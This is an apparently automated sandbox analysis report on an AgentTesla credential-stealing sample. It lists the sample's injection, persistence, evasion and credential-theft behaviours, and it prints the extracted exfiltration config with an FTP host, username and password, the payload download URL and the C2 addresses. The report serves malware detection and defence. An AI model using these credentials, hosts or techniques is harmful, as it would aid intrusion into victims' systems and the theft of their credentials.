Windows Analysis Report
Teklif-6205018797-6100052155-UUE.exe

Overview

General Information

Sample name:Teklif-6205018797-6100052155-UUE.exe
Analysis ID:1520406
MD5:a016634929c4d57cc24719723a4cd65c
SHA1:91e7492b6d3e543f185c69846bd175a626a931f5
SHA256:182b161a951229364aef6e16d358beb00f285c9f146053471ad22e714eefa719
Tags:exe, geo, TUR, user-abuse_ch
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Teklif-6205018797-6100052155-UUE.exe (PID: 3060 cmdline: "C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe" MD5: A016634929C4D57CC24719723A4CD65C)
    • InstallUtil.exe (PID: 6972 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Ptqlzgvzpfa.exe (PID: 1120 cmdline: "C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe" MD5: A016634929C4D57CC24719723A4CD65C)
    • InstallUtil.exe (PID: 6020 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • Ptqlzgvzpfa.exe (PID: 2928 cmdline: "C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe" MD5: A016634929C4D57CC24719723A4CD65C)
    • InstallUtil.exe (PID: 5488 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000005.00000002.2532866894.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000005.00000002.2532866894.0000000002B2A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000000.00000002.2224473393.00000000035BF000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.2224473393.00000000035BF000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000000.00000002.2231136103.0000000005860000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
0.2.Teklif-6205018797-6100052155-UUE.exe.5860000.11.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
0.2.Teklif-6205018797-6100052155-UUE.exe.3e25f60.9.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen

System Summary

Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe, ProcessId: 3060, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ptqlzgvzpfa
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-27T10:43:39.090953+0200 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 5.2.84.236 | 21 | TCP
2024-09-27T10:44:02.252408+0200 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.5 | 52078 | 5.2.84.236 | 21 | TCP
2024-09-27T10:44:10.402749+0200 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.5 | 52080 | 5.2.84.236 | 21 | TCP
2024-09-27T10:43:23.015150+0200 | 2022640 | 1 | A Network Trojan was detected | 67.212.175.162 | 443 | 192.168.2.5 | 49704 | TCP
2024-09-27T10:43:46.488310+0200 | 2022640 | 1 | A Network Trojan was detected | 67.212.175.162 | 443 | 192.168.2.5 | 52073 | TCP
2024-09-27T10:43:54.928209+0200 | 2022640 | 1 | A Network Trojan was detected | 67.212.175.162 | 443 | 192.168.2.5 | 52077 | TCP
2024-09-27T10:43:23.015150+0200 | 2017962 | 1 | A Network Trojan was detected | 67.212.175.162 | 443 | 192.168.2.5 | 49704 | TCP
2024-09-27T10:43:46.488310+0200 | 2017962 | 1 | A Network Trojan was detected | 67.212.175.162 | 443 | 192.168.2.5 | 52073 | TCP
2024-09-27T10:43:54.928209+0200 | 2017962 | 1 | A Network Trojan was detected | 67.212.175.162 | 443 | 192.168.2.5 | 52077 | TCP
2024-09-27T10:43:39.726339+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.5 | 49708 | 5.2.84.236 | 55987 | TCP
2024-09-27T10:43:39.733257+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.5 | 49708 | 5.2.84.236 | 55987 | TCP
2024-09-27T10:44:02.871511+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.5 | 52079 | 5.2.84.236 | 60855 | TCP
2024-09-27T10:44:02.882716+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.5 | 52079 | 5.2.84.236 | 60855 | TCP
2024-09-27T10:44:11.022491+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.5 | 52081 | 5.2.84.236 | 52109 | TCP
2024-09-27T10:44:11.027817+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.5 | 52081 | 5.2.84.236 | 52109 | TCP

AV Detection

Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.raw.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.alternatifplastik.com", "Username": "fgghv@alternatifplastik.com", "Password": "Fineboy777@"}
Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe, ReversingLabs: Detection: 50%
Source: Teklif-6205018797-6100052155-UUE.exe, ReversingLabs: Detection: 50%
Source: Submited Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe, Joe Sandbox ML: detected
Source: Teklif-6205018797-6100052155-UUE.exe, Joe Sandbox ML: detected
Source: Teklif-6205018797-6100052155-UUE.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.5:52073 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.5:52077 version: TLS 1.2
Source: Teklif-6205018797-6100052155-UUE.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Teklif-6205018797-6100052155-UUE.exe, Ptqlzgvzpfa.exe
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Teklif-6205018797-6100052155-UUE.exe, Ptqlzgvzpfa.exe
Source: Binary string: protobuf-net.pdbSHA256}Lq source: Teklif-6205018797-6100052155-UUE.exe
Source: Binary string: protobuf-net.pdb source: Teklif-6205018797-6100052155-UUE.exe

Networking

Source: Network traffic, Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:49708 -> 5.2.84.236:55987
Source: Network traffic, Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:52079 -> 5.2.84.236:60855
Source: Network traffic, Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.5:52081 -> 5.2.84.236:52109
Source: Network traffic, Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:49705 -> 5.2.84.236:21
Source: Network traffic, Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:52080 -> 5.2.84.236:21
Source: Network traffic, Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.5:52078 -> 5.2.84.236:21
Source: Network traffic, Suricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 67.212.175.162:443 -> 192.168.2.5:49704
Source: Network traffic, Suricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 67.212.175.162:443 -> 192.168.2.5:49704
Source: Network traffic, Suricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 67.212.175.162:443 -> 192.168.2.5:52073
Source: Network traffic, Suricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 67.212.175.162:443 -> 192.168.2.5:52073
Source: Network traffic, Suricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 67.212.175.162:443 -> 192.168.2.5:52077
Source: Network traffic, Suricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 67.212.175.162:443 -> 192.168.2.5:52077
Source: global traffic, TCP traffic: 5.2.84.236 ports 1,60855,2,55987,21,52109
Source: global traffic, TCP traffic: 192.168.2.5:49708 -> 5.2.84.236:55987
Source: global traffic, HTTP traffic detected: GET /img/Tcghz.wav HTTP/1.1 Host: wymascensores.com Connection: Keep-Alive
Source: Joe Sandbox View, IP Address: 67.212.175.162
Source: Joe Sandbox View, IP Address: 5.2.84.236
Source: Joe Sandbox View, ASN Name: SINGLEHOP-LLCUS
Source: Joe Sandbox View, ASN Name: ALASTYRTR
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown, FTP traffic detected: 5.2.84.236:21 -> 192.168.2.5:49705
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 2 of 100 allowed.
220-Local time is now 11:43. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 10 minutes of inactivity.
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, DNS traffic detected: DNS query: wymascensores.com
Source: global traffic, DNS traffic detected: DNS query: ftp.alternatifplastik.com
Source: global traffic, DNS traffic detected: DNS query: 50.23.12.20.in-addr.arpa
Source: InstallUtil.exe, String found in binary or memory: http://ftp.alternatifplastik.com
Source: Teklif-6205018797-6100052155-UUE.exe, InstallUtil.exe, Ptqlzgvzpfa.exe, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Teklif-6205018797-6100052155-UUE.exe, InstallUtil.exe, Ptqlzgvzpfa.exe, String found in binary or memory: https://account.dyn.com/
Source: Teklif-6205018797-6100052155-UUE.exe, String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: Teklif-6205018797-6100052155-UUE.exe, Ptqlzgvzpfa.exe, String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: Teklif-6205018797-6100052155-UUE.exe, String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: Teklif-6205018797-6100052155-UUE.exe, String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: Teklif-6205018797-6100052155-UUE.exe, Ptqlzgvzpfa.exe, String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: Teklif-6205018797-6100052155-UUE.exe, String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: Teklif-6205018797-6100052155-UUE.exe, Ptqlzgvzpfa.exe, String found in binary or memory: https://wymascensores.com
Source: Teklif-6205018797-6100052155-UUE.exe, Ptqlzgvzpfa.exe, String found in binary or memory: https://wymascensores.com/img/Tcghz.wav
Source: Teklif-6205018797-6100052155-UUE.exe, Ptqlzgvzpfa.exe.0.dr, String found in binary or memory: https://wymascensores.com/img/Tcghz.wav7__AsyncLocalScope_Current__
Source: unknown, Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 52077
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 52073
Source: unknown, Network traffic detected: HTTP traffic on port 52073 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown, Network traffic detected: HTTP traffic on port 52077 -> 443
                      Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.5:49704 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.5:52073 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 67.212.175.162:443 -> 192.168.2.5:52077 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.raw.unpack, SKTzxzsJw.cs, .Net Code: RePIUNFdBeM

                      System Summary

                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: 2.2.InstallUtil.exe.360000.0.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 2.2.InstallUtil.exe.360000.0.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.raw.unpack, type: UNPACKEDPE, Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.raw.unpack, type: UNPACKEDPE, Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe, Code function: 0_2_0598DCC8 NtProtectVirtualMemory
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe, Code function: 0_2_0598F200 NtResumeThread
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe, Code function: 0_2_0598F1AF NtResumeThread
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe, Code function: 0_2_0598F1F9 NtResumeThread
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe, Code function: 0_2_0598DCC0 NtProtectVirtualMemory
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe, Code function: 4_2_0647F200 NtResumeThread
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe, Code function: 4_2_0647DCC8 NtProtectVirtualMemory
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe, Code function: 4_2_0647DCC0 NtProtectVirtualMemory
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe, Code function: 4_2_0647F1F9 NtResumeThread
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe, Code function: 4_2_0647F1AF NtResumeThread
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe, Code function: 5_2_05D5DCC8 NtProtectVirtualMemory
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe, Code function: 5_2_05D5F200 NtResumeThread
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe, Code function: 5_2_05D5DCC0 NtProtectVirtualMemory
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe, Code function: 5_2_05D5F1F9 NtResumeThread
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe, Code function: 5_2_05D5F1AF NtResumeThread
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2206832205.00000000027FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2206832205.00000000027FC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQhezbmbyba.exe6 vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2206321146.00000000007EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2231386513.00000000058D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2206832205.000000000251E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.0000000003F03000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000035BF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2229849429.0000000005636000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameQhezbmbyba.exe6 vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000000.2070509321.00000000000DA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameQhezbmbyba.exe6 vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.0000000003549000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2206832205.00000000028BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename7dfcfdf2-d881-49c9-a39e-708aca656f85.exe4 vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000034F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000036D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLhnqc.dll" vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.00000000036D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2224473393.000000000366C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLhnqc.dll" vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2232534783.0000000005A10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exe, 00000000.00000002.2230379954.00000000056B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameLhnqc.dll" vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exeBinary or memory string: OriginalFilenameQhezbmbyba.exe6 vs Teklif-6205018797-6100052155-UUE.exe
                      Source: Teklif-6205018797-6100052155-UUE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 2.2.InstallUtil.exe.360000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 2.2.InstallUtil.exe.360000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.raw.unpack, 4JJG6X.cs Cryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.raw.unpack, 8C78isHTVco.cs Cryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.raw.unpack, CqSP68Ir.cs Cryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.35d4a70.2.raw.unpack, CqSP68Ir.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.5a10000.13.raw.unpack, ITaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.5a10000.13.raw.unpack, TaskFolder.cs Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.5a10000.13.raw.unpack, Task.cs Task registration methods: 'RegisterChanges', 'CreateTask'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.5a10000.13.raw.unpack, TaskService.cs Task registration methods: 'CreateFromToken'
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.5a10000.13.raw.unpack, TaskPrincipal.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.5a10000.13.raw.unpack, Task.cs Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.5a10000.13.raw.unpack, User.cs Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.5a10000.13.raw.unpack, TaskSecurity.cs Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.5a10000.13.raw.unpack, TaskSecurity.cs Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: 0.2.Teklif-6205018797-6100052155-UUE.exe.5a10000.13.raw.unpack, TaskFolder.cs Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/2@5/2
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe File created: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Mutant created: NULL
                      Source: Teklif-6205018797-6100052155-UUE.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Teklif-6205018797-6100052155-UUE.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: Teklif-6205018797-6100052155-UUE.exe ReversingLabs: Detection: 50%
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe File read: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe
                      Source: unknown Process created: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe "C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe"
                      Source: C:\Users\user\Desktop\Teklif-6205018797-6100052155-UUE.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: unknown Process created: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe "C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe"
                      Source: C:\Users\user\AppData\Roaming\Ptqlzgvzpfa.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
